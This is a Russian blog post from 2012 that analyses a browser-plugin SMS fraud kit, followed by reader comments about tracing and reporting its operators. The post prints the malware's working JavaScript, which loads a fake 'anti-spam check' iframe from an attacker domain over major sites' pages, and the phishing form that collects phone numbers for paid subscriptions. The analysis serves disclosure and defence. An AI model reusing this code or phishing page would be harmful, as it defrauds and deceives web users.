8,5
рейтинг
10 декабря 2012 в 17:55

Разработка → SMS-вымогатель в виде набора плагинов для браузеров

На днях наткнулся на свежий SMS-вымогатель в виде набора плагинов для браузеров. Как он попал на машину точно сказать не могу, но что у него внутри разберу. Штука свежая, от пятого числа этого месяца, если судить по датам компиляции плагина для IE.





Итак, выглядит данная зараза как показано на скриншоте выше. Также есть вариации для Facebook, Mail.ru, Yandex, Google, Rambler и одноклассников:





Проявляется во всех установленных на машине браузерах. При вводе номера телефона присылает SMS от 1005, просит ответить «Да», что обойдётся ответившиму в 135 рублей (и, скорее всего, подписку на какую-то дрянь). Попутно эта гадость занимается рассылкой сообщений по вконтакту от имени залогиненного пользователя.

Видно, что «бизнес» начал требовать какого-никакого качества. Для каждого сервиса используется свой дизайн окошка. За счёт того, что реализовано всё через плагин браузера, пользователь в подложке видит свой аккаунт, что вызывает некую степень доверия. Ну и так как в hosts писать всякую фигню уже не модно (об этом уже каждый школьник знает), использован альтернативный подход.





Итак, наборчик состоит из плагинов для Chrome, IE и FF, userscript для Opera.

Внутри отличаются незначительно. Все выполняют примерно аналогичный код на JavaScript:

function my_addLoadEvent(func) {
	if(document.readyState == 'complete'){
		func();
	}
	else{
		var oldonload = window.onload;
		if (typeof window.onload != 'function') {
			window.onload = func;
		} else {
			window.onload = function() {
				if (oldonload) {
					oldonload();
				}
				func();
			}
		}
	}
}

var cur_url = document.location.toString();
if('https:' == document.location.protocol) {
	if (typeof(testInformer) === 'undefined') {
		var testInformer = 1;
		var tstImg = new Image();
		tstImg.src = 'http://dreamselfprotection.net/check.php';
		tstImg.onload = function(){
			var ex_url = cur_url.split('/');
			var the_host = ex_url[2];
			if(the_host.substr(0,4) == 'www.')
				the_host = the_host.substr(4);
			var in_hosts = {
				'facebook.com' : 'facebook',
				'my.mail.ru' : 'mymailru',
				'otvet.mail.ru' : 'mailru',
				'games.mail.ru' : 'mailru',
				'love.mail.ru' : 'mailru',
				'news.mail.ru' : 'mailru',
				'mail.ru' : 'mailru',
				'e.mail.ru' : 'mailru',
				'mail.yandex.ru' : 'mailyandex',
				'yandex.ru' : 'mailyandex',
				'ya.ru' : 'mailyandex',
				'mail.google.com' : 'gmail',
				'accounts.google.com' : 'gmail',
				'gmail.com' : 'gmail',
				'google.com' : 'gmail',
				'google.ru' : 'gmail',
				'vk.com' : 'vkontakte',
				'vkontakte.ru' : 'vkontakte',
				'odnoklassniki.ru' : 'odnoklassniki',
				'rambler.ru' : 'rambler',
				'mail.rambler.ru' : 'rambler',
				'nova.rambler.ru' : 'rambler',
				'news.rambler.ru' : 'rambler'
			};

			if(typeof(in_hosts[the_host]) !== 'undefined'){
				my_addLoadEvent(function(){
					var div = document.createElement('div');
					div.style.position = 'fixed';
					div.style.left = '0px';
					div.style.top = '0px';
					div.style.zIndex = '100000';
					div.style.background = '#fff';
					div.style.width = '100%';
					div.style.height = '100%';
					div.style.opacity = '0.8';
					div.style.filter = 'alpha(opacity=80)';
					var innerDiv = document.createElement('div');
					innerDiv.style.position = 'fixed';
					innerDiv.style.left = '50%';
					innerDiv.style.top = '50%';
					innerDiv.style.marginLeft = '-200px';
					innerDiv.style.marginTop = '-125px';
					innerDiv.style.zIndex = '100001';
					innerDiv.style.background = '#fff';
					innerDiv.style.width = '400px';
					innerDiv.style.height = '250px';
					innerDiv.innerHTML = '<iframe width="100%" height="100%" frameborder="0" scrolling="no" src="http://dreamselfprotection.net/real_iframe.php?template='+in_hosts[the_host]+'&from='+the_host+'"></iframe>';
					document.getElementsByTagName('body')[0].appendChild(div);
					document.getElementsByTagName('body')[0].appendChild(innerDiv);
				});
			}
		}
	}
} else {
	var sc = document.createElement('script');
	sc.type = 'text/javascript';
	sc.async = false;
	sc.src = 'http://dreamselfprotection.net/iframe.php';
	var b = document.getElementsByTagName('body')[0];b.appendChild(sc);
}


Код выше загружает тестовую картинку (по видимому, просто проверка на то, что сервер всё ещё жив), передаёт нужные параметры iframe, который вставляет поверх страницы.

real_iframe.php отвечает за содержимое фрейма, генерит следующее:

<!DOCTYPE html>
<html>
    <head>
		<meta http-equiv="Content-Type" content="text/html;  charset=utf-8" />
		<link rel="stylesheet" type="text/css" href="styles/.css?rnd=1355016550" />
		<script src="//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script>
	</head>
	<body>
		<div class="header">Анти-спам проверка</div>
		<div id="contentBlock">
			<div class="desc_text">С Вашего ip замечена подозрительная активность. Возможно Ваш аккаунт пытались взломать. Подтвердите, что Вы являетесь владельцем данного аккаунта.</div>
			<div class="regForm">
				<label for="phone" class="phoneLabel">Введите номер вашего телефона:</label>
				<input type="tel" name="phone" id="phone" class="phone" />
				<input type="submit" class="regButton" value="Продолжить" onclick="registration();return false;" />
				<div style="clear:both"></div>
				<div class="example">Пример: 79161234567</div>
			</div>
		</div>
		<div style="clear:both"></div>
		<div class="error"></div>
		<div class="loading">загрузка...</div>
		<script type="text/javascript">
			function keyfunc(){
				alert(window.event.keyCode);
			}
			
			function showError(txt) {
				$('.error').html(txt);
				$('.error').fadeIn();
				setTimeout('$(".error").fadeOut()',1000);
			}
						
			function loading(s) {
				if(s == 1) {
					$('.loading').show();
					//$('.regButton').attr('disabled', 'disabled');
				} else {
					$('.loading').hide();
					//$('.regButton').removeAttr('disabled');
				}
			}
			
			var temp = {'phone' : ''};
			var mt = 1;
			var loaded = 0;
			
			function registration() {
				var reg = new RegExp("79|89", "i");
				var reg2 = new RegExp("[^0-9]", "i");
				var phone_num = $('#phone').val();
				var hash = 'bbfae214e1fc9e75b95d64724529eeb9';
				if((phone_num.length!=11) || (reg2.test(phone_num) ==true)) {
					showError('Номер телефона указан неверно');
				} else {
					loading(1);
					$.post('request.php',{'c':'reg','num':phone_num,'user':hash,'from':''},function(data){
						temp.phone = phone_num;
						var a = jQuery.parseJSON(data);
						if(a.redirect) {
							$('#contentBlock').html('<div class="desc_text">Для продолжения нажмите на кнопку и завершите процесс в открывшемся окне.</div><br/><input style="margin-left:10px;" type="button" class="regButton" value="Продолжить" onclick="window.open(\''+a.redirect+'#TextBoxActivationCode\',\'\',\'toolbar=0,location=0,menubar=0,directories=0,resizable=0,scrollbars=0,width=360,height=280\');" />');
						}
						else
						{
							if(a.success) {
								if(a.mo) {
									mt = 0;
									moCode();
								} else {
									mt = 1;
									enterCode(phone_num);
								}
							} else {
								showError(a.error);
							}
						}
						loading(0);
					}); 
					//mt = 0;
					//moCode();
				}
			}
			function moCode() {
				$('#contentBlock').html('<div class="desc_text">Для подтверждения, ответьте положительно на полученное сообщение, после чего вы получите код подтверждения.</div>'
				+'<div class="regForm">'
				+'<label for="code" class="phoneLabel">Полученный код:</label>'
				+'<input type="text" name="code" id="code" class="phone" />'
				+'<input type="button" class="regButton" onclick="checkCode()" value="Продолжить" />'
				+'<div style="clear:both"></div>'
				+'<br/><a href="#" onclick="mainWindow();return false;" class="reCodeLink">Получить код заново.</a>'
				+'</div>');
			}
			function enterCode(phone) {
				if(!phone) {
					phone = 79;
				}
				
				$('.cl_info').html('На ваш номер отправлен код подтверждения. Введите его в форму ниже.');
				$('.cl_form').html('<label>Номер телефона: </label>'
				+'<input type="text" value="'+phone+'" id="phone" maxlength="11" DISABLED /><br>'
				+'<label>Код: </label>'
				+'<input type="text" value="" id="code" maxlength=""><br/>');
				$('#controlLink').html('Получить код.').attr('onclick','mainWindow()');
				$('#mbutton').attr('onclick','checkCode()');
			}
			function mainWindow() {
				$('#contentBlock').html('<div class="desc_text">С Вашего ip замечена подозрительная активность. Возможно Ваш аккаунт пытались взломать. Подтвердите, что Вы являетесь владельцем данного аккаунта.</div>'
				+'<div class="regForm">'
				+'<label for="phone" class="phoneLabel">Введите номер вашего телефона:</label>'
				+'<input type="tel" name="phone" id="phone" class="phone" />'
				+'<input type="button" class="regButton" value="Продолжить" onclick="registration();return false;" />'
				+'<div style="clear:both"></div>'
				+'<div class="example">Пример: 79161234567</div>'
				+'</div>');
			}
			function checkCode() {
				var phone = temp.phone;
				var code = $('#code').val();
				loading(1);
				$.post('request.php',{'c':'code','phone':phone,'code':code,'mt':mt},function(data){
					// alert(data);
					var a = jQuery.parseJSON(data);
					if(a.success) {
						document.location.href = '/registered.php?secret=ReallyRegistered';
					} else {
						showError('Неправильный код');
						loading(0);
					}
				});
			}
			
			function rand (min, max) {
				var argc = arguments.length;
				if (argc === 0) {
					min = 0;
					max = 2147483647;
				} else if (argc === 1) {
					throw new Error('Warning: rand() expects exactly 2 parameters, 1 given');
				}
				return Math.floor(Math.random() * (max - min + 1)) + min;
			}
		</script>
		<div style="display:none">
			<!--LiveInternet counter--><script type="text/javascript"><!--
			document.write("<a href='http://www.liveinternet.ru/click' "+
			"target=_blank><img src='//counter.yadro.ru/hit?t52.6;r"+
			escape(document.referrer)+((typeof(screen)=="undefined")?"":
			";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
			screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
			";"+Math.random()+
			"' alt='' title='LiveInternet: number of pageviews and visitors"+
			" for 24 hours is shown' "+
			"border='0' width='88' height='31'><\/a>")
			//--></script><!--/LiveInternet-->
		</div>
	</body>
</html>


Тут всё более-менее прозрачно. Выводится контент окошка, подтягивается нужный CSS, производится валидация формы и, если она валидна, всё отправляется request.php, который, собственно, и отсылает SMS через гейт ООО «Пластик Медиа». Тут стоит отметить две немаловажные детали:

1. Реализована проверка введённого кода и убирание окошка (не тестировал).
2. Ведётся статистика счётчиком liveinternet.ru.

То есть подход довольно основательный, но есть пробелы:

1. Сервер развёрнут фигово. Например, не выставлена timezone, не закрыт phpinfo и SSH, что довольно сильно контрастирует с более-менее продуманным кодом. Либо админ делал лишь бы работало, либо программист делал самостоятельно, не разбираясь детально, что и как должно работать. В обоих случаях у реализатора есть шанс быть взятым за задницу.
2. Эта штука, несмотря на то, что гарантированно испортит её реализатору всю карму и, возможно, чуть более, чем карму, приносит прилично денег. Иначе разработчик сей хреновины не сидел бы за фотошопом CS6 (не факт, что лицензионном) за маком. Кстати, Adobe внедряет уникальные хеши во все картинки. По идее, они могут идентифицировать поганца.

Что со всем этим делать я, если честно, не знаю, но, надеюсь, было интересно.
Александр Макаров @SamDark
карма
281,4
рейтинг 8,5
PHP, Yii, Android
Реклама помогает поддерживать и развивать наши сервисы

Подробнее
Реклама

Самое читаемое Разработка

Комментарии (141)

  • 0
    Каким образом это можно получить? С установкой какой нибудь программы? Windows-only или возможны варианты для других ОС?
    • +5
      Не знаю. За ноутом пару часов провела подруга жены, которая очень любит жать next на все вопросы от чего-либо, так что не удивлюсь, что какая-то софтинка. Варианты для других ОС технически вполне возможны.
    • +1
      Меня интересует другой момент: как выработать иммунитет и на глаз отличить (хотя бы чтобы закралось подозрение) реальный запрос сервиса от проникшей гадости? На скринах вроде бы все выглядит превосходной мимикрией, а при учете того, что сейчас большинство сервисов требуют телефон для двухэтапной аутентификации, все выглядит достаточно правдоподобно.

      У меня есть только такой вариант — привязывать на левую симку, которая не уходит в минус.
      • 0
        На глаз отличить легко — такие сообщения, как правило, содержат орфографические, пунктуационные или стилистические ошибки. Данный пример — не исключение.
      • +3
        Как минимум, нужно насторожиться, если предлагается что-то отправить с телефона (например, здесь нужно было ответить «Да»), а не просто указать его номер. Нормальные сервисы сразу присылают код. Вроде бы (вроде бы) нельзя подписаться на какие-то платные услуги, если просто «засветить» где-то свой номер. Другое дело, что смс-спам может начать приходить, но от этого и без всяких зловредов трудно обезопаситься.
        • 0
          Можно подписаться на платные услуги, если 1) засветить номер и 2) ввести куда-то код который вам пришлют в смс.
          • 0
            Дык вы не вводите никуда код, если вдруг засветили номер. Крупные сервисы не пришлют смс с номера типа ХХХХ, у тех же контактов, вебмани, итп именованые номера…
            • 0
              Во-первых, это я к тому, что попасть на деньги можно и не отправляя смс.
              Во вторых: smsc.ru/faq/#a87 Пишите что хотите в обратном номере. (конкретно на этом сервисе номера модерятся, но уверен что найдутся и такие где прокатит нечто вроде «vkontakte-unblock» )
              • 0
                Стандарт GSM ограничивает длину Source Address в 11 знаков, если мне память не изменяет, так что такое длинное vkontakte-unblock явно не прокатит. Но в целом да, можно подписываться хоть кем.
      • 0
        Ну, у многих номер телефона в ВК и гугле итак уже прописан. Так что если «гугл» вдруг спрашивает номер — это явно не гугл.
        • 0
          Ммм… тот же vk.com номер спрашивает стоит только покинуть родной город с ноутбуком.
          • +1
            Спрашивает не номер, а последние цифры номера…
      • 0
        Есть другой вариант: никогда и нигде в интернете не вбивать свой номер телефона.
        • 0
          Это лишит вас:

          — Интернет-банкинга.
          — Большинства электронных валют.
          — Отлчной двуступенчатой авторизации Google.
          — vk.com
          • 0
            1. В банк обычно требуется идти ногами чтобы открыть аккаунт и привязать телефон (и попутно намекнуть симпатичной девушке за стойкой, что она теперь знает мой телефон ;) ). Но впрочем, ладно, банк можно сделать исключением.
            2. PayPal и Яндекс.Деньги отлично работают.
            3. Использую одноступенчатую, а если будут проблемы с аккаунтом, то это будут, скажем так, не мои проблемы. ;)
            4. Велика беда. :) Действительно, с недавних пор начали требовать телефон. Номер я им не дам, мне проще не пользоваться этим сайтом.
            Кстати, куда им написать, чтобы удалили нафик страницу? Почта саппорта отбивает назад, message cannot be delivered.
            • 0
              4. Не знаю :)
  • +22
    Кстати, если кто знает хороший способ покарать поганца в пределах законов, пишите.
    • –71
      Зачем же сразу карать? Понять и простить.
      Да и думаю тот, кто делал — лишь выполнил заказ, не более.
      • +40
        «Мне сказали, я лишь нажал на курок, не более»…
      • +20
        Тот, кто занимается такими заказами должен осознавать, что он делает, насколько он раздражает жертв и чем оно может обернуться. По-моему покарать будет вполне справедливо.
        • –18
          Так и сотрудников завода огнестрельного оружия карать можно.
          • +3
            Оружие используется не только для преступлений. Здесь же очевидно создаётся инструмент для кражи.
      • +32
        Зашел в ваш профиль(если что, я часто всякие профили просматриваю).
        Любопытно, более, чем за год пребывания на Хабре, вы оставили всего один комментарий — сегодня. В статье про мошенников, в котором просите не карать создателя :)
        • 0
          Да уж, и этим сразу уехал в минус. С почином человека!
          • +4
            Прошёл посвящение? %)
            • +4
              Отставить макать капитана! © Старый добрый мультик.
      • –3
        Понять, простить и опустить. Как минимум.
        • +3
          Убить, сжечь, и закопать.
          • +3
            Убивать нельзя. Надо, чтобы они эти деньги отработали сначала.
            На шахты их отправить или в Сибирь лес рубить.
            • НЛО прилетело и опубликовало эту надпись здесь
              • +6
                В Сибири.
                • +11
                  Не надо нам тут в Сибири такого счастья, оставьте себе.
                  *ушёл поить ручного медведя водкой*
                  • 0
                    Даже если будет жить в клетке отдельно? :)
                  • 0
                    Балалайка на ушанке лежит, возле матрёшек.
                  • 0
                    О! А медведю закусить?
                • 0
                  — А потом вас там публично выпорют, как бродяг, и отправят в Сибирь убирать снег…
                  — Весь?
                  — Да. Снега там много.
                  © Формула любви
            • 0
              На шахты — это слишком абстрактно, а вот в урановые рудники… :)
            • 0
              Рубильщиков там и так с перебором. нехай сажает.
    • 0
      По данных WHOIS, домен был зарегистрирован 30 ноября, быстро обнаружили и предупредили.
    • +19
      Мое небольшое расследование:

      _dreamselfprotection.net/real_iframe.php?template=test
      >> номер: 79111112222

      в ответе получаем линк:
      _moipodpiski.ssl.mts.ru/lp/?SID=5c16cd0a-2c8a-4578-9c83-6b88437e2fca#TextBoxActivationCode

      оформляется подписка на:
      _4anonimz.ru/

      код «function registration()» с 4anonimz.ru почти аналогичен коду с «real_iframe.php» dreamselfprotection.net.

      в исходнике страницы интересный хеш, который не зависит от ip / cookies / referer и т.д., т.е. скорее всего это ид мошенника:
      var user = '0eadab56';

      Теперь нужно выяснить какую партнерку используется мошенник для слива трафика.

      Reverse IP Lookup (http://domaintz.com/tools/reverse-ip/188.93.22.91) показывает что на ip висит еще 3 сайта:
      * gameobmen.ru
      * playster.ru
      * vkagent.ru

      Можно начать копать в сторону этих 3 сайтов.
      • +1
        Уже всё на гугл ведёт, хотя может там ниже уже про это и написали :)
        • 0
          Раньше там был phpinfo. По сути ничего не изменилось.
      • 0
        Покопал. Либо мне кажется, либо владелец всей этой дряни — ООО «ПластикМедиа». По крайней мере, используются везде их короткие номера, код очень похож по стилю и именованию, кое-где висят телефонные номера их саппорта.
    • +1
      Я уже писал заявление про такую историю, и даже проводил расследование. http://www.angrycitizen.ru/case/17547
      Тут же модель монетизации простая — ответное смс на номер находится в предсказуемой группе, следовательно, агрегатор платежей может сдать полиции выгодоприобретателя, с которым он по-любому расплачивается по безналу, а значит, мошенники основательно засветились.
      По такому заявлению реально работают менты, меня приглашали на дополнительные проверки, но мошенников пока не поймали, полиция слишком «лениво» работает, т.к. ущерб небольшой, а заявления не массовые.

      Так что все, кто столкнулся — пожалуйста, напишите заяву в полицию! Это можно сделать через Госуслуги, не вставая с дивана!
  • –5
    человеку устанавливающему в свой браузер плагин с именем YcwYdmSMNX, не поможет ни какой антивирус, ни файрвол
    • +5
      Плагин устанавливался на автомате либо вирусом, либо добровольно. Точно уж не через браузер.
  • +4
    Верно, с МТС идет на подписку:
    • +1
      Ого, нехило так.
    • 0
      Повесьте, пожалуйста, телефоны официальных лиц МТС ) Будем подписывать)
      Или, может быть, скрипт написать, чтоб постил официальные телефоны (например, служб поддержки) с большой скоростью? Небось, отсылка запроса на подписку тоже не бесплатная… )
      • 0
        Отсылка бесплатная у всех/или многих смс-биллингов на подписках.
  • +4
    «лишь выполнил заказ»… ну ну…
    тогда сразу под статью об организованной преступной деятельности… «всего лишь»
    • –3
      Какая статья? Пользователь ставит плагин и вводит свой номер телефона добровольно. По закону не придерёшься.

      А вот моральная сторона вопроса…
      • +2
        Маленькая деталь… пользователь не ставит плагин. Нечто ставит плагин за него. Введение в заблуждение и неправомерный доступ налицо, правда как это всё квалифицируется законом я не знаю. Слаб в этом вопросе.
      • +8
        Мошенничество, ст. 159 УК РФ.
        • 0
          Вот и пишите заявление, почему нет? Портал госуслуг есть, недолго: epgu.gosuslugi.ru/pgu/service/10000013616_25.html
          • 0
            О господи, надо было вам прокомментировать топик годовалой давности
      • 0
        Ввести можно добровольно и номер не своего телефона…

        2 SamDark — проще всего по номеру обратиться в службу безопасности оператора, чей номер.
        Реакция (про мтс могу сказать) — очень быстрая(что не о всех других их действиях скажешь). А с приближением отмены мобильного рабства, imho вообще должно сильно улучшиться.

        Через суд — очень долго и нуторно.
        • 0
          Уже отписал в саппот гейта. У них там Jira, тикет завели.
          • 0
            Получил замечательный ответ «спасибо за информацию». Интересно, последует ли за этим прикрытие лавочки, или же лавочка всё-таки собственная?
            • 0
              Проверьте и не говорите глупости.
              • 0
                Да вот как-то подозрительно что на том же сервере хостились другие проекты аля отошли SMS, подпишись также явно нечистые и в футере были телефоны и адреса саппорта Пластик Медиа. Конечно, никто не мешает подписаться их контактами кому угодно.
                • 0
                  А хостинг тут причем? Со своей стороны мы предприняли необходимые меры. Или вы серьезно думаете, что мы будем покрывать мошенников?
                  • 0
                    Не, к Селектелу у меня никаких претензий нет, конечно. Саппорт нормально отреагировал со здоровой долей подозрительности, рассмотрел всё и принял нормальное решение.

                    Я про инстанс, который деплоился на машину, а не про саму машину. Он не менялся при при переезде на селектел и далее.
  • +11
    «Либо админ делал лишь бы работало, либо программист делал самостоятельно, не разбираясь детально, что и как должно работать.»
    Составление психологического портрета по исходному коду.
    • +5
      Опыт сказывается :) Отсобеседовал очень многих. Начинал всегда с кода.
      • +3
        Кодопсихоанализ.
  • 0
    «Ну и так как в hosts писать всякую фигню уже не модно (об этом уже каждый школьник знает), использован альтернативный подход.»
    Не модно не из-за школьников, а из-за UAC и формграбберов с модулями подмены выдачи.

    P.S. Хороший миниобзор, интересный подход. =)
  • +1
    Простите, а что нельзя просто обратиться к SMS через гейту и потребовать закрыть счёт нехорошим людям? Так как я сам работал с гейтами, то знаю, что в нормальных странах они трясутся над всем, что может отбросить на них тень. Попасть в чёрный список оператора — лишиться денег. У нас за подобные подписки отвечал кошельком сам гейт, как за фрауд с кредитками отвечает банк.
    • +6
      Написал в саппорт ООО «Пластик Медиа» с просьбой закрыть счёт поганцам и передать их данные куда следует.
      • 0
        Пластик Медиа вам благодарны, вы только что дали им возможность забрать награбленное себе :)
        Надо писать жалобу в абонентский отдел МТС, но для этого надо оформить подписку.
        • 0
          У меня нет МТС.
    • +2
      У нас не отвечают и не трясутся. К тому же, они же процент с этого имеют.
  • –2
    Только у меня всплыло окно с просьбой подтвердить аккаунт на хабре?
    • 0
      только у тех, кто поймал плагин.
  • 0
    Спасибо
  • +18
    Всем привет.

    Волею судеб вредоноска эта расположилась у нас на VPS. Спасибо всем хаброюзерам, кто об этом сообщил — доступ прикрыли до дальнейшего прояснения ситуации.
    • +5
      Спасибо. Заархивируйте её на всякий пожарный. Если это не противоречит политике компании, думаю, будет справедливо слить информацию в соответствующие органы.
    • 0
      Уже на селектеле вроде бы…
      • +2
        Ушло письмо в саппорт.
      • +4
        Призываю amarao
        • +3
          А жертву принесете?
        • +1
          А можно в двух словах, о чём речь? А то в посте много букв.
          • +1
            Вредоносная программа, ставится в виде плагина на все браузеры, при заходе на ряд крупных ресурсов (google, mail.ru, вконтакте, фейсбук и т.д.) выкидывает всплывающее окно, стилизованное под этот ресурс, в котором просит дать свой телефон, т.к. якобы с вашего IP подозрительную активность заметил «этот ресурс».

            Затем приходит смска, если на неё ответить, то со счёта списывается 135 рублей, плюс оформляется подписка на сторонний сервис, который каждый день списывает со счёта ещё по 11 рублей
            • 0
              Если abuse написали, то саппорт уже должен разбираться.
              • 0
                Написали ещё вчера. Всё ещё живо и у вас: 188.93.22.91
          • +7
            Ни фига себе) Вам сейчас в двух словах по-свойски опишут че-как, и вы пойдете заблочите своего клиента, возможно так и не ознакомившись детально с постом? Буду знать )
            • 0
              Нет, на саппорт кто-то уже прислал ссылку на хабр, но этого недостаточно для блокировки. Ждем нормального письма с указанием ip и описания претензии.
              • 0
                Отвечали бы хотя-бы… Как претензию оформить? Кроме указания IP я вроде нормально изложил суть.
              • 0
                Написал ещё одно частично процитировав пост и указав IP.
              • 0
                Нужные ещё какие-то данные для более быстрого реагирования? Два дня уже у вас эта гадость висит. На том же IP ещё несколько бэкендов со схожими целями habrahabr.ru/post/162075/#comment_5565279
                • 0
                  При написании абузы рекомендуется указывать ip нарушителя и кратко описать в чем собственно нарушение с упоминанием вредоносных URL. Просматривать страницы js кода, статью и комментарии на 7 экранов, чтобы выцепить оттуда вредоносный URL/ip это уж слишком. И уж точно не стоит писать в абузе короткие номера, это явно не к хостеру, а к операторам мобильной связи.
                  • +1
                    ОК, IP был указан, краткое описание тоже. Ссылки на явно фишерские окошки и скрипт даны. Зловреды пока ещё целы-невредимы. Когда ждать реакции?
                    • 0
                      Клиенту дано время на реакцию.
            • +3
              Просто для понимания: это не клиент облака, а к другим услагам Селектела у меня админских прав нет. Так что я в данном случае скорее любопытствующий.
          • +2
            Бэкенд для SMS-вымогателя оперативно переехал с VPS, откуда был оперативно выпилен, на селектел.
  • +6
    Я так же считаю что следует передать ссылки этих мошенников в

    https://www.badwarebusters.org/community/submit
    http://www.google.com/safebrowsing/report_phish/?tpl=mozilla&hl=ru&url=http%3A%2F%2Fdreamselfprotection.net%2F

    Что бы просто так не кликали на их сайты, ну а как только сайт туда в БД попадает, эти ссылки потом до грузятся в обновлении для антивирусов и они будут блокировать доступ к сайтам.
  • +2
    Кстати, всегда интересовало, почему у авторов таких поделок практически всегда вылезают орфографические/грамматические ошибки или просто косяки вроде согласования «Вашего»/«вашего»?
    • 0
      Потому что не филологи пишут подобные софтины и орфография, думается мне, их мало волнует.
      • +2
        Логично, но на отсутствие запятой во втором приложении, например, ругается Word. Почему этим людям так сложно проверить перед публикацией текст хотя бы в нём? Мне в таких «вирусах» в глаза бросаются, в первую очередь, ошибки в тексте, а уже потом всё остальное.
        • –1
          Может эти люди не совсем успешно закончили школу или вообще ещё её не закончили? :)
    • +2
      Тоже часто обращал внимание на ошибки. Мое предположение, но это только предположение, что это как бы «ярлычок» указывающий на мошенничество. Подобное можно встретить с поддельными продуктами, берешь подделку и оригинал сравниваешь и оказывается отличие в одном слове или в одной букве или в мелкой детали. Почему не делают 100% копию, опять же не понятно?
      Возможно, что бы сами мошенники могли отличить свой продукт.
    • НЛО прилетело и опубликовало эту надпись здесь
      • +4
        Что за хитрая нумерация? Что-то не доходит до меня.
        • НЛО прилетело и опубликовало эту надпись здесь
          • 0
            У авторов зловредов тоже вряд ли нормированный график (:
        • 0
          Молодой компьютерный гений детектед Вами.
  • +6
    Самое интересное, что фрод зачем-то решил хостить сервер в России.
    У товарища, видимо, в голове опилки.
    • +3
      Скорее всего не опилки, а малолетство. В сочетании с орфографией и стилистикой надписей в формах.
  • +4
    Я думаю, нужно обращаться в полицию с заявлением, приложив к нему все имеющиеся данные. Налицо все признаки мошенничества. Там разберутся, есть отдел «К», туда перенаправят. Бороться со злоумышленниками одними лишь техническими средствами — это полумера, прикроют один их «проект» — появится другой. Нужно не блокировать им доступ, а наоборот, стараться, не выдавая себя, собрать как можно больше информации, через которую можно проследить их личности и местонахождение.
    • +1
      Как к ним обратиться не убивая на это пару дней личного времени, которого и так мало?
      • 0
        К сожалению, никак.
      • +2
        На портале гос.услуги (gosuslugi.ru) оставить заявление. У меня принимали, запрос потом приходит в УВД по месту жительства.
        • +2
          Что именно там искать?
          • 0
            Это к вопросу о пустой трате личного времени
            • 0
              К сожалению, да. Там столько всего, что если точно не знать, как нужное называется, ничего не находится.
  • +1
    Пока такие особы не будут понимать что их рано или поздно однозначно отловят и посадят на очень долго это всё будет процветать. Посим думаю нужно отлавливать и сажать на максимально возможный срок, с публикацией каждого отлова всредствах массойвой информации.
    • 0
      Думаю стоит попробовать раскидать рассылку по всем своим друзьям и знакомым, чтобы если где это увидели, рекомендовали обращаться с заявлениями в указанные выше органы. Ведь если заявок будет не одна — две, а сотни и даже тысячи, пошевелиться им придется)
      З. Ы.: не рекомендуется разве что лицам, у которых зараженный ПК напичкан нелицензионными программами, ибо проще засудить пользователя, нежели искать авторов вредоносного ПО
      • 0
        То есть рекомендуете обрекать друзей на трату времени и изъятие железа для анализа?
        • 0
          я не рекомендую обрекать их, я говорю что стоит им порекомендовать данный метод, если у них есть такое желание. И почему же только друзей? Я подразумевал что многие кто занимается лечением компьютеров от вирусов и прочего, могут рекомендовать обратиться в соответствующие инстанции.
  • +1
    Начинайте карать Большую Тройку ) не ошибетесь )
  • +1
    >Иначе разработчик сей хреновины не сидел бы за фотошопом CS6 (не факт, что лицензионном) за маком.
    А по этим хешам можно отличить хакинтош от мака?

    >Кстати, Adobe внедряет уникальные хеши во все картинки. По идее, они могут идентифицировать поганца.
    Интересно. Где про это почитать можно? Добавляется некая «ватермарка» на само изображение или в методанные файла что-то пишется?
    • 0
      По хешам можно. В метаданные пишет.
  • НЛО прилетело и опубликовало эту надпись здесь
    • 0
      Для всего сохраняемого продукты Adobe раздают псевдоуникальные хеши в метаданных. У многих есть подозрения, что это вовсе не хеши.
  • +1
    Буквально за 2 минуты до того, как наткнулся на этот пост, позвонила мама и зачитала текст такого же сообщения «от одноклассников». Быстро штука расходится.
    Я подумал сначала, что это поп-ап какой-нибудь на левом сайте и сказал просто страницу закрыть. А все хуже, оказывается. Спасибо за пост. Будем сейчас маме помогать (:
    • 0
      Если есть время, напишите пару жалоб — одну в селектел, на котором сейчас эта гадость крутится, одну провайдеру мамы. Если совсем есть время — в органы.
  • НЛО прилетело и опубликовало эту надпись здесь
  • +3
    Самое интересное — а не читает ли он эту переписку?
    • 0
      Вполне возможно, что читает.
      • +5
        тогда можно будет вскоре ждать версию 2.0, с учетом «пожеланий» так сказать :)
        • +2
          В таком случае, желаем ему рака яичек.
          • НЛО прилетело и опубликовало эту надпись здесь
            • 0
              >>… и чтобы заработал он его на урановых рудниках.
              В сибири!
  • 0
    IP клиента заблокирован
    • 0
      Отлично. Теперь они на 188.190.127.119.
  • 0
    А зачем плагин? В гугле по запросу Хоббит-что то там(то что сейчас идет в кинотеатрах) 4 ссылки на первой странице ведут на сайты однодневки с вымогательством смс подписки. Никаких плагинов не нужно все и так работает.
    • 0
      Одно дело когда вылезает предложение поиграться с SMS на каком-то подозрительном хоббит-сайте, другое — в твоём gmail.
      • 0
        Вылезает там где надо. Мне так хотелось посмотреть что там за хоббит вышел что я даже не сразу ушел с вымогательских сайтов пытаясь понять нету ли там какой-нибудь возможности получить желаемое.
  • 0
    С хостингами бороться бесполезно, пришлось радикальнее
    image
    • 0
      Хе-хе, я тоже с утречка отсылал. Видно, помогло, что завяка не единственная.

Только зарегистрированные пользователи могут оставлять комментарии. Войдите, пожалуйста.